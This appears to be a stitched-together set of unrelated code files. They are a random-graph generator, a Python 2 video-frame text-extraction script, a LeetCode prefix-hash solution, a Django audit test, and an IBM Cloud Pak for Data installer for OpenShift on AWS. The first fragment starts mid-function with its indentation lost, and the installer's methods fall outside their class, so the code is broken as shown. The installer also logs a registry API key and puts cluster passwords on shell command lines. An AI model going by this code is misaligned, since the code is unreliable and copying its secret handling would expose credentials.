pairs = list(itertools.permutations(numbers, 2))
# Randomly shuffle these pairs
random.shuffle(pairs)
if not directed:
indx = (np.random.rand(len(pairs)) > 0.5) * 1
else:
indx = (np.random.rand(len(pairs)) > 0.85) * 1
tuples = []
for idx, f in enumerate(indx):
if f == 1:
tuples.append(pairs[idx])
else:
pass
return tuples
def random_graph_generator(nodes, directed=False,return_edges=False):
    """
    Build a random graph over `nodes` vertices.

    Args:
        nodes: number of vertices (ids are 1..nodes)
        directed: build a directed graph; a reversed copy is also returned
        return_edges: additionally return the number of edges

    Returns:
        undirected: node list (plus edge count when return_edges)
        directed: (node list, reversed-graph node list) plus edge count
        when return_edges
    """
    edges = get_random_pairs(list(range(nodes)), directed)

    forward = [graph(id=i + 1, directed=directed) for i in range(nodes)]
    # The reversed graph only exists in directed mode.
    backward = [graph(id=i + 1, directed=directed) for i in range(nodes)] if directed else []

    for src, dst in edges:
        forward[src].add_adjacent(forward[dst])
        if directed:
            # Same edge, flipped, in the reversed graph.
            backward[dst].add_adjacent(backward[src])

    if not directed:
        return (forward, len(edges)) if return_edges else forward
    return (forward, backward, len(edges)) if return_edges else (forward, backward)
# usage
# g,gr =random_graph_generator(10,directed=True)
|
import sys, cv2, math, numpy
import phase1, phase2, time
# Python 2 script: samples ~one frame per second from a lecture video,
# finds text segments (phase1) and extracts their text (phase2), and
# archives frames with significant inter-second pixel changes.
if len(sys.argv) > 2:
    print 'skipping to frame', sys.argv[2]
if len(sys.argv) < 2:
    print 'err: need argument mentioning video number'
    sys.exit()
vnum = int(sys.argv[1])
###########
# Video #0 is a special case routed to the 'ignore/' window set.
big_windows = 'ignore/' if vnum == 0 else ''
###########
###########
# check videos #5 and 6
# Hard-coded frame rates per video, indexed by vnum-1.
fps_list = [15.002999, 29.970030, 30, 23.976150, 30, 29.970030, 30.001780, 30, 29.970030, 29.970030, 30, 15, 23.976024, 30, 15, 30, 29.873960, 30, 15, 25.000918, 30]
fps = fps_list[vnum-1]
video = cv2.VideoCapture('../public/videos/video'+str(vnum)+'.mp4')
fnum = 0
# if len(sys.argv) == 3:
#     duration = 7980
#     fnum = int(sys.argv[2])-1
#     video.set(2, fnum /(duration*fps));
success, image = video.read()
prev = numpy.zeros(image.shape, numpy.uint8)    # previously sampled frame, for diffing
time1, time2 = 0, 0                             # cumulative seconds in phase1 / phase2
while success:
    fnum += 1
    t_min = int((fnum/fps)/60)
    t_sec = int(math.floor((fnum/fps)%60)) #check
    # Periodic progress note while fast-forwarding to the requested frame.
    if len(sys.argv) > 2 and fnum < int(sys.argv[2]) and fnum%7200 == 0:
        print 'crossed frame', fnum # at time
    if round(fnum%fps) == 1 and (len(sys.argv) < 3 or fnum >= int(sys.argv[2])): # process one frame each second
        # Pixel-level difference against the previously sampled frame.
        diff = cv2.subtract(image, prev)
        imgray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
        ndiff = cv2.countNonZero(imgray)
        # sys.stdout.write("\r100%\033[K")
        # print '\r%d:%02d processing...' % (t_min, t_sec), # (<ndiff> differences)
        # sys.stdout.flush()
        path = '../public/extracts/video'+str(vnum)
        sys.stdout.write("\r100%\033[K")
        print '\r%d:%02d finding segments...' % (t_min, t_sec),
        sys.stdout.flush()
        start1 = time.time()
        # cv2.imwrite(path+'/frame'+str(fnum)+'.jpg', image)
        segments = phase1.process(image, path, 'frame'+str(fnum)+'-segment', big_windows)
        end1 = time.time()
        time1 += end1 - start1
        # write num_segments somewhere
        sys.stdout.write("\r100%\033[K")
        print '\r%d:%02d extracting text...' % (t_min, t_sec),
        sys.stdout.flush()
        start2 = time.time()
        phase2.process(fnum, segments, path)
        end2 = time.time()
        time2 += end2 - start2
        if ndiff > 7500: # show significant changes #improve
            # Outline the changed regions and archive the annotated frame.
            marked = image.copy()
            ret, thresh = cv2.threshold(imgray, 60, 255, 0)
            contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
            cv2.drawContours(marked, contours, -1, (0,255,0), 1)
            cv2.imwrite(path+'/diffs/'+'frame'+str(fnum)+'.jpg', marked)
        prev = image
    # end of if stmt
    success, image = video.read()
# end of while loop #todo
print '\ndone'
print '1:', round(time1, 2)
print '2:', round(time2, 2)
|
# 1392. Longest Happy Prefix
'''
A string is called a happy prefix if is a non-empty prefix which is also a suffix (excluding itself).
Given a string s. Return the longest happy prefix of s .
Return an empty string if no such prefix exists.
Example 1:
Input: s = "level"
Output: "l"
Explanation: s contains 4 prefix excluding itself ("l", "le", "lev", "leve"), and suffix ("l", "el", "vel", "evel"). The largest prefix which is also suffix is given by "l".
'''
# Basic idea: hash
# Similar to Rabin-Karp algorithm
class Solution:
    def longestPrefix(self, s: str) -> str:
        """Return the longest proper prefix of s that is also a suffix.

        Rolling polynomial hashes (base 33, modular) are grown from both
        ends in O(n); on a hash match the substrings are compared
        directly, so a hash collision can no longer yield a wrong answer.
        """
        l, r = 0, 0
        mod = 10**6 + 3
        res = ''
        for i in range(len(s)-1):
            # Prefix hash absorbs s[i] at the low-order end...
            l = (l*33 + ord(s[i])) % mod
            # ...suffix hash absorbs s[-(i+1)] at the high-order end.
            r = (r + pow(33, i, mod)*ord(s[~i])) % mod
            # Verify the actual strings to rule out hash collisions.
            if l == r and s[:i+1] == s[-(i+1):]:
                res = s[:i+1]
        return res
''' Tests for chronicler.models.create_audit '''
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from chronicler.models import AuditItem, create_audit
from chronicler.tests import TestCase
from chronicler.tests.models import Person, Group, Membership
class TestCreateAudit(TestCase):
    def test_create_audit(self):
        ''' Tests audit.models.create_audit receiver. Asserts that we properly
        create an AuditItem
        '''
        # Fixture: one person in two groups with differing gold_member flags.
        person = Person.objects.create(name='Tester')
        user, _ = User.objects.get_or_create(username='analyte')
        content_type = ContentType.objects.get_for_model(Person)
        group = Group.objects.create(name='group_one')
        group_two = Group.objects.create(name='group_two')
        member_one = Membership.objects.create(
            person=person,
            group=group,
            gold_member=True
        )
        member_two = Membership.objects.create(
            person=person,
            group=group_two,
            gold_member=False
        )
        # Audit the person including the reverse membership_set relation.
        create_audit(
            Person,
            person,
            ['membership_set'],
            user
        )
        audit = AuditItem.objects.get(
            content_type=content_type,
            object_id=person.pk
        )
        data = audit.audit_data
        # Both memberships must be captured with ids, FKs and flags intact.
        audit_member_one, audit_member_two = data['membership_set']
        self.assertEqual(audit_member_one['id'], member_one.pk)
        self.assertEqual(audit_member_two['id'], member_two.pk)
        self.assertEqual(audit_member_one['group'], member_one.group.pk)
        self.assertEqual(audit_member_two['group'], member_two.group.pk)
        self.assertEqual(audit_member_one['gold_member'], True)
        self.assertEqual(audit_member_two['gold_member'], False)
        # A change followed by a second audit must snapshot the new state.
        member_two.gold_member = True
        member_two.save()
        create_audit(
            Person,
            person,
            ['membership_set'],
            user
        )
        audit = AuditItem.objects.order_by('-pk')[0]
        self.assertEqual(
            audit.audit_data['membership_set'][1]['gold_member'],
            True
        )
|
#!/usr/bin/python
import sys, os.path, time, stat, socket, base64,json
import boto3
import shutil
import requests
import yapl.Utilities as Utilities
from subprocess import call,check_output, check_call, CalledProcessError, Popen, PIPE
from os import chmod, environ
from botocore.exceptions import ClientError
from yapl.Trace import Trace, Level
from yapl.LogExporter import LogExporter
from yapl.Exceptions import MissingArgumentException
# Module-level tracer for this installer script.
TR = Trace(__name__)
# Stack parameter cache shared with CPDInstall's __getattr__/__setattr__,
# which expose CloudFormation parameters as read-only attributes.
StackParameters = {}
StackParameterNames = []
class CPDInstall(object):
ArgsSignature = {
'--region': 'string',
'--stack-name': 'string',
'--stackid': 'string',
'--logfile': 'string',
'--loglevel': 'string',
'--trace': 'string'
}
def __init__(self):
    """
    Constructor

    NOTE: Some instance variable initialization happens in self._init() which is
    invoked early in main() at some point after _getStackParameters().
    """
    object.__init__(self)
    # Fixed working locations under /ibm (expanduser is a no-op for an
    # absolute path; kept as written).
    self.home = os.path.expanduser("/ibm")
    self.logsHome = os.path.join(self.home,"logs")
    self.sshHome = os.path.join(self.home,".ssh")
#endDef
def _getArg(self, synonyms, args, default=None):
    """
    Return the value from the args dictionary that may be specified with any of the
    argument names in the list of synonyms.

    The synonyms argument may be a list of strings or a single string holding
    a comma- or space-separated list of names.  The first name present in
    args with a non-None value wins; otherwise the given default is returned.

    NOTE: comparisons are made explicitly against None (never plain
    truthiness) so that a legitimate value of 0 supplied in the command
    line args dictionary is honoured rather than replaced by the default.
    """
    # Accept a "name1,name2" style string as well as a real list.
    if not isinstance(synonyms, list):
        synonyms = Utilities.splitString(synonyms)
    #endIf

    for name in synonyms:
        value = args.get(name)
        if (value is not None):
            # Early return avoids the break-then-recheck dance of the
            # original loop.
            return value
        #endIf
    #endFor

    return default
#endDef
def _configureTraceAndLogging(self,traceArgs):
    """
    Return a tuple with the trace spec and logFile if trace is set based on given traceArgs.

    traceArgs is a dictionary with the trace configuration specified.
       loglevel|trace <tracespec>
       logfile|logFile <pathname>

    If trace is specified in the trace arguments then set up the trace.
    If a log file is specified, then set up the log file as well.
    If trace is specified and no log file is specified, then the log file is
    set to "trace.log" in the current working directory.
    """
    logFile = self._getArg(['logFile','logfile'], traceArgs)
    if (logFile):
        TR.appendTraceLog(logFile)
    #endIf

    trace = self._getArg(['trace', 'loglevel'], traceArgs)
    if (trace):
        if (not logFile):
            # Tracing requested without a log file: default destination.
            TR.appendTraceLog('trace.log')
        #endIf
        TR.configureTrace(trace)
    #endIf
    return (trace,logFile)
#endDef
def getStackParameters(self, stackId):
    """
    Return a dictionary with stack parameter name-value pairs from the
    CloudFormation stack with the given stackId.
    """
    stack = self.cfnResource.Stack(stackId)
    # Flatten boto3's [{'ParameterKey': ..., 'ParameterValue': ...}, ...]
    # shape into a plain name -> value mapping.
    return {parm['ParameterKey']: parm['ParameterValue']
            for parm in stack.parameters}
def __getattr__(self,attributeName):
    """
    Support for attributes that are defined in the StackParameterNames list
    and with values in the StackParameters dictionary.
    """
    # Only reached when normal attribute lookup fails; exposes the module
    # level stack parameters as read-only instance attributes.
    attributeValue = None
    if (attributeName in StackParameterNames):
        attributeValue = StackParameters.get(attributeName)
    else:
        raise AttributeError("%s is not a StackParameterName" % attributeName)
    #endIf
    return attributeValue
#endDef
def __setattr__(self,attributeName,attributeValue):
    """
    Support for attributes that are defined in the StackParameterNames list
    and with values in the StackParameters dictionary.

    NOTE: The StackParameters are intended to be read-only.  It's not
    likely they would be set in the Bootstrap instance once they are
    initialized in getStackParameters().
    """
    # Stack-parameter names go to the shared module dictionary; everything
    # else is a normal instance attribute.
    if (attributeName in StackParameterNames):
        StackParameters[attributeName] = attributeValue
    else:
        object.__setattr__(self, attributeName, attributeValue)
    #endIf
#endDef
def installCPD(self,icpdInstallLogFile):
    """
    Install IBM Cloud Pak for Data (CPD) 3.5.2 on the OpenShift cluster.

    High-level flow:
      - download the cloudctl CLI and the ibm-cp-datacore case archive
        from the S3 bucket named by self.cpdbucketName
      - log in to the cluster as kubeadmin and create the operator project
        (cpd-meta-ops) and the user-defined service project (self.Namespace)
      - install the CPD operator, then the "lite" control plane, then each
        optional service assembly selected via stack parameters

    Parameters
    ----------
    icpdInstallLogFile : file
        Open file object receiving stdout of the invoked shell commands.
    """
    cloudctl_destPath = "/ibm/cloudctl-linux-amd64.tar.gz"
    cloudctl_sig_destPath = "/ibm/cloudctl-linux-amd64.tar.gz.sig"
    cp_datacore_destPath = "/ibm/ibm-cp-datacore.tgz"
    methodName = "installCPD"
    # Fetch the installer artifacts from the release bucket.
    self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/cloudctl-linux-amd64.tar.gz", destPath=cloudctl_destPath)
    self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/cloudctl-linux-amd64.tar.gz.sig", destPath=cloudctl_sig_destPath)
    self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/ibm-cp-datacore-1.3.3.tgz", destPath=cp_datacore_destPath)
    # cloudctl binary goes onto the PATH; the datacore case archive is
    # extracted into the current working directory.
    untar_cmd = "sudo tar -xvf "+cloudctl_destPath+" -C /usr/bin"
    TR.info(methodName,"untarcmd =%s"%untar_cmd)
    call(untar_cmd,shell=True,stdout=icpdInstallLogFile)
    untar_datacore_cmd = "tar -xf "+cp_datacore_destPath
    TR.info(methodName,"untar_datacore_cmd =%s"%untar_datacore_cmd)
    call(untar_datacore_cmd,shell=True,stdout=icpdInstallLogFile)
    # Resolve the cluster's internal image registry route.
    default_route = "oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}'"
    TR.info(methodName,"Get default route %s"%default_route)
    try:
        # NOTE(review): "regsitry" looks like a typo for "registry"; left
        # unchanged here in case other code reads this attribute name.
        self.regsitry = check_output(['bash','-c', default_route])
        TR.info(methodName,"Completed %s command with return value %s" %(default_route,self.regsitry))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Log in as kubeadmin using the password written by the OpenShift installer.
    self.ocpassword = self.readFileContent("/ibm/installDir/auth/kubeadmin-password").rstrip("\n\r")
    try:
        oc_login = "oc login -u kubeadmin -p "+self.ocpassword
        retcode = call(oc_login,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"Log in to OC with admin user %s"%retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Project that hosts the CPD meta operator.
    oc_new_project ="oc new-project cpd-meta-ops"
    try:
        retcode = call(oc_new_project,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"Create meta ops project cpd-meta-ops,retcode=%s" %(retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    self.installOperator(icpdInstallLogFile)
    # Project that will host the CPD services themselves.
    oc_new_project ="oc new-project "+self.Namespace
    try:
        retcode = call(oc_new_project,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"Create new project with user defined project name %s,retcode=%s" %(self.Namespace,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    #self.token = self.getToken(icpdInstallLogFile)
    # Map the StorageType stack parameter onto the storage class name and
    # the override value consumed by installAssemblies().
    if(self.StorageType=='OCS'):
        self.storageClass = "ocs-storagecluster-cephfs"
        self.storageOverrideFile = "/ibm/override_ocs.yaml"
        self.storageOverride = "ocs"
    elif(self.StorageType=='Portworx'):
        self.storageClass = "portworx-shared-gp3"
        self.storageOverrideFile = "/ibm/override_px.yaml"
        self.storageOverride = "portworx"
    elif(self.StorageType=='EFS'):
        self.storageClass = "aws-efs"
        self.storageOverride = ""
    # "lite" is the CPD control plane and is always installed first.
    litestart = Utilities.currentTimeMillis()
    TR.info(methodName,"Start installing Lite package")
    self.installAssemblies("lite",icpdInstallLogFile)
    liteend = Utilities.currentTimeMillis()
    self.printTime(litestart, liteend, "Installing Lite")
    # The console route created in the service namespace is the CPD URL.
    get_cpd_route_cmd = "oc get route -n "+self.Namespace+ " | grep '"+self.Namespace+"' | awk '{print $2}'"
    TR.info(methodName, "Get CPD URL")
    try:
        self.cpdURL = check_output(['bash','-c', get_cpd_route_cmd])
        TR.info(methodName, "CPD URL retrieved %s"%self.cpdURL)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    self.manageUser(icpdInstallLogFile)
    # Install each optional assembly the user selected via stack parameters,
    # timing each one individually.
    if(self.installDV):
        TR.info(methodName,"Start installing DV package")
        dvstart = Utilities.currentTimeMillis()
        self.installAssemblies("dv",icpdInstallLogFile)
        dvend = Utilities.currentTimeMillis()
        TR.info(methodName,"DV package installation completed")
        self.printTime(dvstart, dvend, "Installing DV")
    if(self.installWSL):
        TR.info(methodName,"Start installing WSL package")
        wslstart = Utilities.currentTimeMillis()
        self.installAssemblies("wsl",icpdInstallLogFile)
        wslend = Utilities.currentTimeMillis()
        TR.info(methodName,"WSL package installation completed")
        self.printTime(wslstart, wslend, "Installing WSL")
    if(self.installWML):
        TR.info(methodName,"Start installing WML package")
        wmlstart = Utilities.currentTimeMillis()
        self.installAssemblies("wml",icpdInstallLogFile)
        wmlend = Utilities.currentTimeMillis()
        TR.info(methodName,"WML package installation completed")
        self.printTime(wmlstart, wmlend, "Installing WML")
    if(self.installSpark):
        TR.info(methodName,"Start installing Spark AE package")
        sparkstart = Utilities.currentTimeMillis()
        self.installAssemblies("spark",icpdInstallLogFile)
        sparkend = Utilities.currentTimeMillis()
        TR.info(methodName,"Spark AE package installation completed")
        self.printTime(sparkstart, sparkend, "Installing Spark AE")
    if(self.installWKC):
        TR.info(methodName,"Start installing WKC package")
        wkcstart = Utilities.currentTimeMillis()
        self.installAssemblies("wkc",icpdInstallLogFile)
        wkcend = Utilities.currentTimeMillis()
        TR.info(methodName,"WKC package installation completed")
        self.printTime(wkcstart, wkcend, "Installing WKC")
    if(self.installOSWML):
        TR.info(methodName,"Start installing AI Openscale package")
        aiostart = Utilities.currentTimeMillis()
        self.installAssemblies("aiopenscale",icpdInstallLogFile)
        aioend = Utilities.currentTimeMillis()
        TR.info(methodName,"AI Openscale package installation completed")
        self.printTime(aiostart, aioend, "Installing AI Openscale")
    if(self.installCDE):
        TR.info(methodName,"Start installing Cognos Dashboard package")
        cdestart = Utilities.currentTimeMillis()
        self.installAssemblies("cde",icpdInstallLogFile)
        cdeend = Utilities.currentTimeMillis()
        TR.info(methodName,"Cognos Dashboard package installation completed")
        self.printTime(cdestart, cdeend, "Installing Cognos Dashboard")
    TR.info(methodName,"Installed all packages.")
#endDef
def installOperator(self,icpdInstallLogFile):
    """
    Install the CPD operator into the cpd-meta-ops project using the
    cloudctl "case" launcher with the IBM entitled registry credentials.

    Waits five minutes after the launcher completes, then checks that the
    ibm-cp-data-operator pod is in Running state.

    Raises
    ------
    Exception
        If the operator pod is not Running after the wait.
    """
    methodName = "installOperator"
    # The entitled-registry API key (self.apiKey) is embedded in the command
    # line; note the command is also written to the trace log below.
    cloudctl_cmd = 'cloudctl-linux-amd64 case launch --case ibm-cp-datacore --namespace cpd-meta-ops --inventory cpdMetaOperatorSetup --action install-operator --tolerance=1 --args "--entitledRegistry cp.icr.io/cp/cpd --entitledUser cp --entitledPass '+self.apiKey+'"'
    try:
        TR.info(methodName,"Execute install operator %s"%cloudctl_cmd)
        retcode = check_output(['bash','-c',cloudctl_cmd])
        TR.info(methodName,"Install operator returned %s"%retcode)
        # Give the operator deployment five minutes to come up before the
        # single status check below (no retry loop here).
        time.sleep(300)
        cloudctl_status_cmd = "oc get pods -n cpd-meta-ops -l name=ibm-cp-data-operator --no-headers | awk '{print $3}'"
        retcode = check_output(['bash','-c',cloudctl_status_cmd])
        TR.info(methodName,"Execute install operator returned %s"%(retcode))
        # NOTE(review): substring test assumes check_output returns str
        # (Python 2); under Python 3 it returns bytes — confirm interpreter.
        if("Running" not in retcode):
            TR.error(methodName,"Installation of operator Failed %s"%retcode)
            raise Exception("Installation of operator Failed: %s" % retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
#endDef
def printTime(self, beginTime, endTime, text):
    """
    Log the wall-clock time spent on an installation step.

    beginTime and endTime are millisecond timestamps (as returned by
    Utilities.currentTimeMillis); text labels the step in the log line.
    """
    methodName = "printTime"
    totalSeconds = (endTime - beginTime)/1000
    # Split the duration into hours, minutes and seconds.
    hours, remainder = divmod(totalSeconds, 3600)
    minutes, seconds = divmod(remainder, 60)
    TR.info(methodName,"Elapsed time (hh:mm:ss): %d:%02d:%02d for %s" % (hours,minutes,seconds,text))
#endDef
def updateTemplateFile(self, source, placeHolder, value):
    """
    Replace every occurrence of placeHolder in the given template file
    with value, rewriting the file in place.

    Parameters
    ----------
    source : str
        Path of the template file to update.
    placeHolder : str
        Literal token to replace (e.g. '${STORAGECLASS}').
    value : str
        Replacement text.
    """
    # Use context managers so both file handles are closed deterministically;
    # the original never closed the read handle (left to the GC) and would
    # leak the write handle if write() raised.
    with open(source) as templateFile:
        content = templateFile.read()
    content = content.replace(placeHolder, value)
    with open(source, 'w') as updatedFile:
        updatedFile.write(content)
#endDef
def readFileContent(self,source):
    """
    Return the content of the given file with trailing whitespace stripped.

    Parameters
    ----------
    source : str
        Path of the file to read.

    Returns
    -------
    str
        File content, right-stripped (trailing newlines/spaces removed).
    """
    # Context manager guarantees the handle is closed even if read() raises;
    # the original only closed it on the success path.
    with open(source, mode='r') as contentFile:
        return contentFile.read().rstrip()
#endDef
def installAssemblies(self, assembly, icpdInstallLogFile):
    """
    Install a single CPD service assembly (e.g. "lite", "dv", "wsl") by
    rendering a CPDService custom resource from the template and polling
    the operator until it reports the service Ready.

    Parameters
    ----------
    assembly : str
        Short name of the assembly; also used in the CR file name and the
        cpdservice resource name.
    icpdInstallLogFile : file
        Open file object receiving stdout of the oc create command.

    Raises
    ------
    Exception
        If the operator reports the service status as Failed.
    """
    methodName = "installAssemblies"
    # Render the per-service CR from the shared template using the storage
    # settings chosen earlier in installCPD().
    service_tmpl = "/ibm/installDir/cpd-service.tpl.yaml"
    service_cr = "/ibm/installDir/cpd-"+assembly+".yaml"
    shutil.copyfile(service_tmpl,service_cr)
    self.updateTemplateFile(service_cr,'${SERVICE}',assembly)
    self.updateTemplateFile(service_cr,'${STORAGECLASS}',self.storageClass)
    self.updateTemplateFile(service_cr,'${override-storage}', self.storageOverride)
    install_cmd = "oc create -f "+service_cr
    try:
        TR.info(methodName,"Execute install command for assembly %s"%assembly)
        retcode = call(install_cmd,shell=True, stdout=icpdInstallLogFile)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    TR.info(methodName,"Execute install command for assembly %s returned %s"%(assembly,retcode))
    # Poll the CR status once a minute until the operator reports Ready.
    cr_status_cmd = "oc get cpdservice "+assembly+"-cpdservice --output='jsonpath={.status.status}' | xargs"
    try:
        # "retcode" is reused here as the status string of the poll loop.
        # NOTE(review): there is no overall timeout — a stuck install will
        # loop here indefinitely; confirm that is intended.
        retcode = "Installing"
        while(retcode.rstrip()!="Ready"):
            time.sleep(60)
            retcode = check_output(['bash','-c',cr_status_cmd])
            TR.info(methodName,"Get install status for assembly %s is %s"%(assembly,retcode))
            if(retcode.rstrip() == "Failed"):
                TR.error(methodName,"Installation of assembly %s Failed"%assembly)
                raise Exception("Installation of assembly %s Failed"%assembly)
        TR.info(methodName,"Get install status for assembly %s is %s"%(assembly,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
def getS3Object(self, bucket=None, s3Path=None, destPath=None):
    """
    Return destPath which is the local file path provided as the destination of the download.

    A pre-signed URL is created and used to download the object from the given S3 bucket
    with the given S3 key (s3Path) to the given local file system destination (destPath).

    The destination path is assumed to be a full path to the target destination for
    the object.

    If the directory of the destPath does not exist it is created.

    It is assumed the objects to be gotten are large binary objects.

    For details on how to download a large file with the requests package see:
    https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py
    """
    methodName = "getS3Object"

    if (not bucket):
        raise MissingArgumentException("An S3 bucket name (bucket) must be provided.")
    #endIf

    if (not s3Path):
        raise MissingArgumentException("An S3 object key (s3Path) must be provided.")
    #endIf

    if (not destPath):
        raise MissingArgumentException("A file destination path (destPath) must be provided.")
    #endIf

    TR.info(methodName, "STARTED download of object: %s from bucket: %s, to: %s" % (s3Path,bucket,destPath))

    # The URL is only valid for 60 seconds; it is used immediately below.
    s3url = self.s3.generate_presigned_url(ClientMethod='get_object',Params={'Bucket': bucket, 'Key': s3Path},ExpiresIn=60)
    TR.fine(methodName,"Getting S3 object with pre-signed URL: %s" % s3url)

    destDir = os.path.dirname(destPath)
    if (not os.path.exists(destDir)):
        os.makedirs(destDir)
        TR.info(methodName,"Created object destination directory: %s" % destDir)
    #endIf

    r = requests.get(s3url, stream=True)
    # Fail fast on an HTTP error: without this check an expired or invalid
    # pre-signed URL would silently write the S3 XML error document to
    # destPath instead of the object content.
    r.raise_for_status()
    with open(destPath, 'wb') as destFile:
        # Stream the raw response to disk to avoid holding large binaries
        # in memory.
        shutil.copyfileobj(r.raw, destFile)
    #endWith

    TR.info(methodName, "COMPLETED download from bucket: %s, object: %s, to: %s" % (bucket,s3Path,destPath))

    return destPath
#endDef
def manageUser(self, icpdInstallLogFile):
    """
    Update the default password of the CPD admin user to the user-defined
    password (self.password).

    Note: the CPD password is made the same as the OpenShift cluster
    password.  The change is applied by exec-ing manage-user.sh inside the
    usermgmt pod of the CPD namespace.
    """
    methodName = "manageUser"
    # The password is piped into manage-user.sh via printf; it therefore
    # appears in the exec'd command line inside the pod.
    bash_cmd = 'printf \"'+self.password+'\n" | /usr/src/server-src/scripts/manage-user.sh --enable-user admin'
    # "tail -1 | cut -f1 -d " selects the name of (one of) the usermgmt pods.
    manageUser="oc -n "+self.Namespace+" exec -it $(oc get pod -n "+self.Namespace+" -l component=usermgmt | tail -1 | cut -f1 -d\ ) -- bash -c '"+bash_cmd+"'"
    TR.info(methodName,"Start manageUser")
    try:
        retcode = check_output(['bash','-c', manageUser])
        TR.info(methodName,"End manageUser returned %s"%(retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
def updateStatus(self, status):
    """
    Post the installation status to the external tracking endpoint.

    Best effort: a failure to report the status is logged but does not
    interrupt the installation.

    Parameters
    ----------
    status : str
        Status value to report (appended to the tracker payload).
    """
    methodName = "updateStatus"
    TR.info(methodName," Update Status of installation")
    data = "352_AWS_STACK,Status="+status
    updateStatus = "curl -X POST https://un6laaf4v0.execute-api.us-west-2.amazonaws.com/testtracker --data "+data
    # subprocess.call() reports failure through its return code; it never
    # raises CalledProcessError, so the original except block was dead code.
    # Check the return code explicitly instead.
    retcode = call(updateStatus, shell=True)
    if (retcode != 0):
        TR.error(methodName,"Status update command failed with return code %s" % retcode)
    else:
        TR.info(methodName,"Updated status with data %s"%data)
    #endIf
#endDef
def configureEFS(self):
    """
    Configure an EFS volume and configure all worker nodes to be able to use
    the EFS storage provisioner.

    Fills the EFS-specific placeholders in the manifest templates, then
    applies, in order: the configmap (in the default namespace), the
    efs-provisioner service account, the RBAC template, the storage class,
    the provisioner deployment, and the PVC.

    Raises
    ------
    Exception
        If any oc command exits with a non-zero return code.
    """
    methodName = "configureEFS"
    TR.info(methodName,"STARTED configuration of EFS")

    def _ocCreate(manifestPath, extraArgs=""):
        # Apply one manifest with oc and abort the EFS configuration on a
        # non-zero return code.  Factored out of six near-identical
        # invoke/log/check sequences.
        cmd = "oc create -f " + manifestPath + extraArgs
        TR.info(methodName,"Invoking: %s" % cmd)
        retcode = call(cmd, shell=True)
        if (retcode != 0):
            raise Exception("Error calling oc. Return code: %s" % retcode)
        #endIf
    #endDef

    # Fill in the EFS-specific placeholders before applying the manifests.
    self.updateTemplateFile("/ibm/templates/efs/efs-configmap.yaml",'${file-system-id}',self.EFSID)
    self.updateTemplateFile("/ibm/templates/efs/efs-configmap.yaml",'${aws-region}',self.region)
    self.updateTemplateFile("/ibm/templates/efs/efs-configmap.yaml",'${efsdnsname}',self.EFSDNSName)
    self.updateTemplateFile("/ibm/templates/efs/efs-provisioner.yaml",'${file-system-id}',self.EFSID)
    self.updateTemplateFile("/ibm/templates/efs/efs-provisioner.yaml",'${aws-region}',self.region)

    _ocCreate("/ibm/templates/efs/efs-configmap.yaml", " -n default")

    # The service account is created by name rather than from a manifest.
    sa_cmd = "oc create serviceaccount efs-provisioner"
    TR.info(methodName,"Invoking: %s" % sa_cmd)
    retcode = call(sa_cmd, shell=True)
    if (retcode != 0):
        raise Exception("Error calling oc. Return code: %s" % retcode)
    #endIf

    _ocCreate("/ibm/templates/efs/efs-rbac-template.yaml")
    _ocCreate("/ibm/templates/efs/efs-storageclass.yaml")
    _ocCreate("/ibm/templates/efs/efs-provisioner.yaml")
    _ocCreate("/ibm/templates/efs/efs-pvc.yaml")

    TR.info(methodName,"COMPLETED configuration of EFS.")
#endDef
def configureOCS(self,icpdInstallLogFile):
    """
    Configure OpenShift Container Storage (OCS) as the storage class for CPD.

    Reads user preferences from the stack parameters; depending on whether
    1 or 3 availability zones are in use, the appropriate template file is
    used to create the storage machinesets.  The resulting nodes are then
    labeled for OCS, the OCS operator is deployed via OLM, the storage
    cluster is created, and the ceph toolbox pod is installed.
    """
    methodName = "configureOCS"
    TR.info(methodName," Start configuration of OCS for CPD")
    workerocs = "/ibm/templates/ocs/workerocs.yaml"
    workerocs_1az = "/ibm/templates/ocs/workerocs1AZ.yaml"
    # Single-AZ deployments overwrite the default (3-AZ) machineset
    # template with the 1-AZ variant before filling placeholders.
    if(len(self.zones)==1):
        shutil.copyfile(workerocs_1az,workerocs)
    self.updateTemplateFile(workerocs,'${az1}', self.zones[0])
    self.updateTemplateFile(workerocs,'${ami_id}', self.amiID)
    self.updateTemplateFile(workerocs,'${instance-type}', self.OCSInstanceType)
    self.updateTemplateFile(workerocs,'${instance-count}', self.NumberOfOCS)
    self.updateTemplateFile(workerocs,'${region}', self.region)
    self.updateTemplateFile(workerocs,'${cluster-name}', self.ClusterName)
    self.updateTemplateFile(workerocs, 'CLUSTERID', self.clusterID)
    self.updateTemplateFile(workerocs,'${subnet-1}',self.PrivateSubnet1ID)
    # Multi-AZ deployments additionally fill the second and third AZ/subnet.
    if(len(self.zones)>1):
        self.updateTemplateFile(workerocs,'${az2}', self.zones[1])
        self.updateTemplateFile(workerocs,'${az3}', self.zones[2])
